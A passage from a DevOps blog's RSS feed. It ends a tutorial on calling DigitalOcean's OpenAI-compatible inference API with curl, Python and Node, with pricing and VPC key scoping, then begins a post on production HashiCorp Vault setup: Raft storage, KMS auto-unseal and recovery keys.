              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The endpoint lives at <code>https://inference.do-ai.run/v1</code> and mirrors the OpenAI chat completions API. We will use <code>openai-gpt-oss-20b</code>, the cheapest text model in the catalog, which is plenty for a first call:</p>
<pre><code class="hljs language-bash">curl https://inference.do-ai.run/v1/chat/completions \
  -H <span class="hljs-string">&quot;Authorization: Bearer <span class="hljs-variable">$DO_INFERENCE_KEY</span>&quot;</span> \
  -H <span class="hljs-string">&quot;Content-Type: application/json&quot;</span> \
  -d <span class="hljs-string">&#x27;{
    &quot;model&quot;: &quot;openai-gpt-oss-20b&quot;,
    &quot;messages&quot;: [
      {&quot;role&quot;: &quot;system&quot;, &quot;content&quot;: &quot;You are a concise assistant.&quot;},
      {&quot;role&quot;: &quot;user&quot;, &quot;content&quot;: &quot;In one sentence, what is a reverse proxy?&quot;}
    ],
    &quot;max_tokens&quot;: 80
  }&#x27;</span>
</code></pre><p>The response is the standard OpenAI shape. Here is the real one this returned, trimmed for readability:</p>
<pre><code class="hljs language-json"><span class="hljs-punctuation">{</span>
  <span class="hljs-attr">&quot;object&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;chat.completion&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;model&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;openai-gpt-oss-20b&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;choices&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span>
    <span class="hljs-punctuation">{</span>
      <span class="hljs-attr">&quot;index&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">0</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;finish_reason&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;stop&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;message&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
        <span class="hljs-attr">&quot;role&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;assistant&quot;</span><span class="hljs-punctuation">,</span>
        <span class="hljs-attr">&quot;content&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;A reverse proxy is a server that sits between clients and backend servers, receiving client requests and forwarding them to appropriate internal services while returning the responses, thereby abstracting and protecting the internal infrastructure.&quot;</span>
      <span class="hljs-punctuation">}</span>
    <span class="hljs-punctuation">}</span>
  <span class="hljs-punctuation">]</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;usage&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
    <span class="hljs-attr">&quot;prompt_tokens&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">87</span><span class="hljs-punctuation">,</span>
    <span class="hljs-attr">&quot;completion_tokens&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">74</span><span class="hljs-punctuation">,</span>
    <span class="hljs-attr">&quot;total_tokens&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">161</span>
  <span class="hljs-punctuation">}</span>
<span class="hljs-punctuation">}</span>
</code></pre><p>That is the entire round trip. No GPU, no model download, no cold-start wait you had to manage.</p>
<h2 id="h2-step-3-the-same-call-with-the-openai-python-sdk" class="group relative scroll-mt-24">
        <a href="#h2-step-3-the-same-call-with-the-openai-python-sdk" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 3: The same call with the OpenAI Python SDK
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-step-3-the-same-call-with-the-openai-python-sdk"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Because the API is OpenAI-compatible, you use the official <code>openai</code> library and point it at DigitalOcean by setting <code>base_url</code>. Nothing else about your code changes.</p>
<pre><code class="hljs language-bash">pip install openai
</code></pre><pre><code class="hljs language-python"><span class="hljs-keyword">import</span> os
<span class="hljs-keyword">from</span> openai <span class="hljs-keyword">import</span> OpenAI

client = OpenAI(
    base_url=<span class="hljs-string">&quot;https://inference.do-ai.run/v1&quot;</span>,
    api_key=os.environ[<span class="hljs-string">&quot;DO_INFERENCE_KEY&quot;</span>],
)

resp = client.chat.completions.create(
    model=<span class="hljs-string">&quot;openai-gpt-oss-20b&quot;</span>,
    messages=[
        {<span class="hljs-string">&quot;role&quot;</span>: <span class="hljs-string">&quot;system&quot;</span>, <span class="hljs-string">&quot;content&quot;</span>: <span class="hljs-string">&quot;You are a concise assistant.&quot;</span>},
        {<span class="hljs-string">&quot;role&quot;</span>: <span class="hljs-string">&quot;user&quot;</span>, <span class="hljs-string">&quot;content&quot;</span>: <span class="hljs-string">&quot;In one sentence, what is a reverse proxy?&quot;</span>},
    ],
    max_tokens=<span class="hljs-number">80</span>,
)

<span class="hljs-built_in">print</span>(resp.choices[<span class="hljs-number">0</span>].message.content)
<span class="hljs-built_in">print</span>(resp.usage.prompt_tokens, <span class="hljs-string">&quot;in /&quot;</span>, resp.usage.completion_tokens, <span class="hljs-string">&quot;out&quot;</span>)
</code></pre><p>Run against the live endpoint (tested with <code>openai</code> 2.43.0), this printed:</p>
<pre><code class="hljs language-text">A reverse proxy is a server that lies between clients and backend servers,
forwarding client requests to those servers and returning the servers&#x27; responses
back to the clients.
87 in / 91 out
</code></pre><p>If you have an existing app built on the OpenAI SDK, this is the whole migration: change <code>base_url</code>, change the API key, change the model name.</p>
<h2 id="h2-step-4-the-same-call-with-the-openai-node-sdk" class="group relative scroll-mt-24">
        <a href="#h2-step-4-the-same-call-with-the-openai-node-sdk" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 4: The same call with the OpenAI Node SDK
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-step-4-the-same-call-with-the-openai-node-sdk"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Identical story in JavaScript. Install the SDK and set <code>baseURL</code>:</p>
<pre><code class="hljs language-bash">npm install openai
</code></pre><pre><code class="hljs language-javascript"><span class="hljs-keyword">import</span> <span class="hljs-title class_">OpenAI</span> <span class="hljs-keyword">from</span> <span class="hljs-string">&quot;openai&quot;</span>;

<span class="hljs-keyword">const</span> client = <span class="hljs-keyword">new</span> <span class="hljs-title class_">OpenAI</span>({
  <span class="hljs-attr">baseURL</span>: <span class="hljs-string">&quot;https://inference.do-ai.run/v1&quot;</span>,
  <span class="hljs-attr">apiKey</span>: process.<span class="hljs-property">env</span>.<span class="hljs-property">DO_INFERENCE_KEY</span>,
});

<span class="hljs-keyword">const</span> resp = <span class="hljs-keyword">await</span> client.<span class="hljs-property">chat</span>.<span class="hljs-property">completions</span>.<span class="hljs-title function_">create</span>({
  <span class="hljs-attr">model</span>: <span class="hljs-string">&quot;openai-gpt-oss-20b&quot;</span>,
  <span class="hljs-attr">messages</span>: [
    { <span class="hljs-attr">role</span>: <span class="hljs-string">&quot;system&quot;</span>, <span class="hljs-attr">content</span>: <span class="hljs-string">&quot;You are a concise assistant.&quot;</span> },
    { <span class="hljs-attr">role</span>: <span class="hljs-string">&quot;user&quot;</span>, <span class="hljs-attr">content</span>: <span class="hljs-string">&quot;In one sentence, what is a reverse proxy?&quot;</span> },
  ],
  <span class="hljs-attr">max_tokens</span>: <span class="hljs-number">80</span>,
});

<span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(resp.<span class="hljs-property">choices</span>[<span class="hljs-number">0</span>].<span class="hljs-property">message</span>.<span class="hljs-property">content</span>);
<span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(resp.<span class="hljs-property">usage</span>.<span class="hljs-property">prompt_tokens</span>, <span class="hljs-string">&quot;in /&quot;</span>, resp.<span class="hljs-property">usage</span>.<span class="hljs-property">completion_tokens</span>, <span class="hljs-string">&quot;out&quot;</span>);
</code></pre><p>Tested with <code>openai</code> 6.44.0 for Node, this returned:</p>
<pre><code class="hljs language-text">A reverse proxy is a server that sits between clients and backend servers,
forwarding client requests to the appropriate server and returning the server&#x27;s
response, often providing load balancing, SSL termination, or caching.
87 in / 62 out
</code></pre><h2 id="h2-reading-the-response" class="group relative scroll-mt-24">
        <a href="#h2-reading-the-response" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Reading the response
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-reading-the-response"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Two fields are worth knowing about beyond the obvious <code>content</code>:</p>
<ul>
<li><strong><code>usage</code></strong> is how you reason about cost. Every call reports <code>prompt_tokens</code>, <code>completion_tokens</code>, and <code>total_tokens</code>. Billing is per token, so this object is your meter.</li>
<li>The <code>gpt-oss</code> models also return a <code>reasoning_content</code> field alongside <code>content</code>, holding the model&#39;s intermediate reasoning. You usually render <code>content</code> to users and keep <code>reasoning_content</code> for debugging or logging.</li>
</ul>
<p>To see the full catalog of model slugs you can pass as <code>model</code>, hit the models endpoint:</p>
<pre><code class="hljs language-bash">curl https://inference.do-ai.run/v1/models \
  -H <span class="hljs-string">&quot;Authorization: Bearer <span class="hljs-variable">$DO_INFERENCE_KEY</span>&quot;</span>
</code></pre><p>At the time of writing that returns 67 models, spanning OpenAI (<code>openai-gpt-5.5</code>, <code>openai-gpt-4o-mini</code>, the open <code>openai-gpt-oss-20b</code> and <code>openai-gpt-oss-120b</code>), Anthropic (<code>anthropic-claude-opus-4.8</code>, <code>anthropic-claude-4.6-sonnet</code>, <code>anthropic-claude-haiku-4.5</code>), Meta Llama, Mistral, DeepSeek, NVIDIA Nemotron, and embedding and image models. Switching models is a one-string change.</p>
<h2 id="h2-what-it-costs" class="group relative scroll-mt-24">
        <a href="#h2-what-it-costs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What it costs
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-it-costs"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The model we used, <code>gpt-oss-20b</code>, is billed at <strong>$0.05 per 1M input tokens and $0.45 per 1M output tokens</strong>. The call in Step 2 used 87 input and 74 output tokens, which works out to about four thousandths of a cent. You can run this tutorial hundreds of times before it rounds up to a penny.</p>
<p>Switching models is a one-string change, and the price range across the catalog is wide. Output tokens are the cost driver (they are more expensive than input on every model), and the small open models sit far below the frontier ones:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Output price per 1M tokens, by model&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;DigitalOcean Inference Engine list prices, June 2026. Input tokens are cheaper than output on every model.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;deepseek-v4-flash&quot;,&quot;value&quot;:0.28,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-oss-20b&quot;,&quot;value&quot;:0.45,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-4o-mini&quot;,&quot;value&quot;:0.6,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;llama3.3-70b&quot;,&quot;value&quot;:0.65,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-oss-120b&quot;,&quot;value&quot;:0.7,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;claude-haiku-4.5&quot;,&quot;value&quot;:5,&quot;series&quot;:&quot;frontier&quot;},{&quot;label&quot;:&quot;claude-sonnet-4.6&quot;,&quot;value&quot;:15,&quot;series&quot;:&quot;frontier&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;open / small&quot;,&quot;color&quot;:&quot;#34d399&quot;},{&quot;name&quot;:&quot;frontier&quot;,&quot;color&quot;:&quot;#f59e0b&quot;}]}"></div><p>Rates are abstract, so here is the concrete version: the exact prompt from this tutorial (87 input, 74 output tokens), run 100,000 times, priced on each model. The same workload swings from a few dollars on a small open model to over a hundred on a frontier one:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Cost per 100,000 calls (this tutorial's prompt: 87 in / 74 out)&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;Same request, different model, at June 2026 list prices. Pick the smallest model that clears your quality bar.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;deepseek-v4-flash&quot;,&quot;value&quot;:3.29,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-oss-20b&quot;,&quot;value&quot;:3.77,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-4o-mini&quot;,&quot;value&quot;:5.75,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;gpt-oss-120b&quot;,&quot;value&quot;:6.05,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;llama3.3-70b&quot;,&quot;value&quot;:10.47,&quot;series&quot;:&quot;open / small&quot;},{&quot;label&quot;:&quot;claude-haiku-4.5&quot;,&quot;value&quot;:45.7,&quot;series&quot;:&quot;frontier&quot;},{&quot;label&quot;:&quot;claude-sonnet-4.6&quot;,&quot;value&quot;:137.1,&quot;series&quot;:&quot;frontier&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;open / small&quot;,&quot;color&quot;:&quot;#34d399&quot;},{&quot;name&quot;:&quot;frontier&quot;,&quot;color&quot;:&quot;#f59e0b&quot;}]}"></div><p>The pricing model matters as much as the number. You pay per token, not per GPU-hour, because serverless inference pools GPU capacity across customers, so an idle app costs nothing. DigitalOcean also applies a small off-peak discount on eligible open models during overnight hours, which is worth knowing if you run large batch jobs you can schedule. The practical rule the second chart points at: start on the cheapest model that clears your quality bar, and only reach for a frontier model on the prompts that genuinely need it.</p>
<h2 id="h2-a-note-on-that-403-vpc-scoping" class="group relative scroll-mt-24">
        <a href="#h2-a-note-on-that-403-vpc-scoping" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          A note on that 403 (VPC scoping)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-a-note-on-that-403-vpc-scoping"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If your very first call comes back as <code>403 Forbidden</code> even though the key is correct and has access to all models, check whether the key is bound to a VPC. A VPC-scoped key is rejected for any request that does not originate inside that private network. That is a feature, not a bug: in production you want your inference key locked to your VPC so it cannot be used from anywhere else. For local testing from your laptop, create a key with no VPC restriction (and delete it when you are done), or run your test from a Droplet inside the VPC.</p>
<p>It is a good habit to adopt the moment you go past experimenting: scope the production key to your VPC, scope it to only the models you actually call, and set an expiration date.</p>
<h2 id="h2-where-to-go-next" class="group relative scroll-mt-24">
        <a href="#h2-where-to-go-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where to go next
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-where-to-go-next"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>You now have a working, OpenAI-compatible LLM call with nothing to operate. From here:</p>
<ul>
<li><strong>Swap the model</strong> to match the task. Use a small open model like <code>gpt-oss-20b</code> for cheap, high-volume work and a frontier model for the hard prompts, changing one string.</li>
<li><strong>Add retrieval</strong> with DigitalOcean&#39;s Knowledge Bases and managed Weaviate when you need answers grounded in your own data.</li>
<li><strong>Reach for dedicated inference</strong> if you need predictable latency for a single model under steady load, rather than the pooled serverless tier.</li>
<li><strong>Build an agent</strong> when a single call is not enough. If you go that route, our take on <a href="https://devops-daily.com/posts/ai-sre-agents-what-they-fix-and-break">what AI SRE agents actually fix and what they break</a> is worth reading before you give one access to anything that matters.</li>
</ul>
<p>The thing that makes this approachable is the same thing that makes it easy to leave if you ever want to: it is just the OpenAI API with a different base URL. Start with the cheap model and a curl command, and grow into the rest only when a real requirement asks for it.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Secrets Management Best Practices with HashiCorp Vault]]></title>
      <link>https://devops-daily.com/posts/hashicorp-vault-secrets-management-best-practices</link>
      <description><![CDATA[Run HashiCorp Vault the way production needs it: auto-unseal, AppRole auth for machines, dynamic database credentials that expire on their own, and encryption as a service. Real config, real terminal output.]]></description>
      <pubDate>Mon, 22 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/hashicorp-vault-secrets-management-best-practices</guid>
      <category><![CDATA[Security]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[vault]]></category><category><![CDATA[secrets-management]]></category><category><![CDATA[security]]></category><category><![CDATA[dynamic-secrets]]></category><category><![CDATA[encryption]]></category>
      <content:encoded><![CDATA[<p>A database password leaks. Maybe it was committed to a private repo three years ago, maybe it sat in a CI log, maybe a contractor copied it into a Slack DM. You do not know, because that password has been valid the entire time and nobody rotated it. Now you are in an incident channel at 2am trying to figure out the blast radius of a credential that every service, every old laptop, and every backup job has used since 2023.</p>
<p>This is the problem HashiCorp Vault solves, and it is not the problem most teams use it for. Most teams install Vault, run it in dev mode, dump a pile of static key-value secrets into it, and call it done. That gives you an encrypted password store with a nicer API. Useful, but it leaves the worst part untouched: secrets that live forever and that no human can fully account for.</p>
<p>The real win with Vault is making secrets short-lived and generated on demand, so a leak has an expiry date measured in hours instead of years. This post shows how to run Vault for that: a production server that survives reboots, machine authentication that does not depend on root tokens, dynamic database credentials, and encryption as a service. Every command here is one you can run.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Never run <code>vault server -dev</code> for anything real. It is in-memory and unsealed, so a restart wipes every secret.</li>
<li>Use auto-unseal (AWS KMS, GCP KMS, or another Vault) so a reboot does not need five humans with key shares.</li>
<li>Authenticate machines with <strong>AppRole</strong>, not long-lived root or service tokens.</li>
<li>Use <strong>dynamic secrets</strong> for databases. Vault creates a unique DB user per request with a short TTL and deletes it when the lease ends.</li>
<li>Use the <strong>transit engine</strong> for encryption as a service so your apps never touch the encryption keys.</li>
<li>Write least-privilege policies, turn on the audit log, and revoke leases when something goes wrong.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A Linux host (or VM) where you can install the Vault binary</li>
<li>Vault 1.15 or newer (<code>vault version</code> to check)</li>
<li>A PostgreSQL database you can point Vault at for the dynamic secrets section</li>
<li>An AWS account with a KMS key if you want auto-unseal (optional but recommended)</li>
<li>Basic comfort with the command line and HCL config files</li>
</ul>
<h2 id="h2-stop-running-vault-in-dev-mode" class="group relative scroll-mt-24">
        <a href="#h2-stop-running-vault-in-dev-mode" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Stop running Vault in dev mode
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-stop-running-vault-in-dev-mode"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Dev mode is the trap. You run one command and get a working Vault:</p>
<pre><code class="hljs language-bash">vault server -dev
</code></pre><pre><code class="hljs language-text">==&gt; Vault server configuration:
             Api Address: http://127.0.0.1:8200
                     Cgo: disabled
         Cluster Address: https://127.0.0.1:8201
              Listener 1: tcp (addr: &quot;127.0.0.1:8200&quot;, tls: &quot;disabled&quot;)
               Log Level: info
                   Mlock: supported: true, enabled: false
           Recovery Mode: false
                 Storage: inmem

WARNING! dev mode is enabled! In this mode, Vault runs entirely in-memory
and starts unsealed with a single unseal key.
</code></pre><p>Read that warning. <code>Storage: inmem</code> means every secret lives in RAM and disappears on restart. <code>tls: disabled</code> means traffic is plaintext. It starts unsealed, so anyone who reaches port 8200 owns it. Dev mode is for trying commands on your laptop, nothing else.</p>
<p>A production server needs three things dev mode skips: persistent storage, TLS, and a seal. Here is a real <code>config.hcl</code> using integrated Raft storage and AWS KMS auto-unseal:</p>
<pre><code class="hljs language-hcl"><span class="hljs-comment"># /etc/vault.d/vault.hcl</span>
storage <span class="hljs-string">&quot;raft&quot;</span> {
  path    = <span class="hljs-string">&quot;/opt/vault/data&quot;</span>
  node_id = <span class="hljs-string">&quot;vault-1&quot;</span>
}

listener <span class="hljs-string">&quot;tcp&quot;</span> {
  address       = <span class="hljs-string">&quot;0.0.0.0:8200&quot;</span>
  tls_cert_file = <span class="hljs-string">&quot;/opt/vault/tls/vault.crt&quot;</span>
  tls_key_file  = <span class="hljs-string">&quot;/opt/vault/tls/vault.key&quot;</span>
}

<span class="hljs-comment"># Auto-unseal: Vault asks KMS to decrypt its root key on boot.</span>
<span class="hljs-comment"># No more gathering humans with key shares after every restart.</span>
seal <span class="hljs-string">&quot;awskms&quot;</span> {
  region     = <span class="hljs-string">&quot;us-east-1&quot;</span>
  kms_key_id = <span class="hljs-string">&quot;arn:aws:kms:us-east-1:111122223333:key/abc-12345&quot;</span>
}

api_addr     = <span class="hljs-string">&quot;https://vault-1.internal:8200&quot;</span>
cluster_addr = <span class="hljs-string">&quot;https://vault-1.internal:8201&quot;</span>
ui           = true
</code></pre><p>Start it and initialize once:</p>
<pre><code class="hljs language-bash">vault server -config=/etc/vault.d/vault.hcl &amp;

<span class="hljs-built_in">export</span> VAULT_ADDR=<span class="hljs-string">&quot;https://vault-1.internal:8200&quot;</span>
vault operator init -recovery-shares=5 -recovery-threshold=3
</code></pre><pre><code class="hljs language-text">Recovery Key 1: vR2k9... (give to a different person than key 2)
Recovery Key 2: 8Lp4m...
Recovery Key 3: qW7nZ...
Recovery Key 4: 3xF8t...
Recovery Key 5: hT1bY...

Initial Root Token: hvs.CAESIJ...

Success! Vault is initialized

Recovery key initialized with 5 key shares and a key threshold of 3.
</code></pre><p>Because of auto-unseal you get <strong>recovery keys</strong> instead of unseal keys. Vault unseals itself on boot using KMS, and the recovery keys are only for emergencies like regenerating the root token. Split them across different people and store them offline. Never keep all of them in one place.</p>
<p>Now use that root token once to set up authentication and policies, then throw it away. Root tokens are for break-glass moments, not daily use.</p>
<pre><code class="hljs language-bash">vault login hvs.CAESIJ...
</code></pre><p>If you ever see this, your Vault restarted and could not reach its seal:</p>
<pre><code class="hljs language-text">$ vault kv get secret/payments/stripe
Error making API request.
URL: GET https://vault-1.internal:8200/v1/secret/data/payments/stripe
Code: 503. Errors:
* Vault is sealed
</code></pre><p>A sealed Vault answers nothing. That is the whole point. Auto-unseal exists so this state heals itself instead of paging you.</p>
<h2 id="h2-authenticate-machines-with-approle-not-tokens" class="group relative scroll-mt-24">
        <a href="#h2-authenticate-machines-with-approle-not-tokens" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Authenticate machines with AppRole, not tokens
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-authenticate-machines-with-approle-not-tokens"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
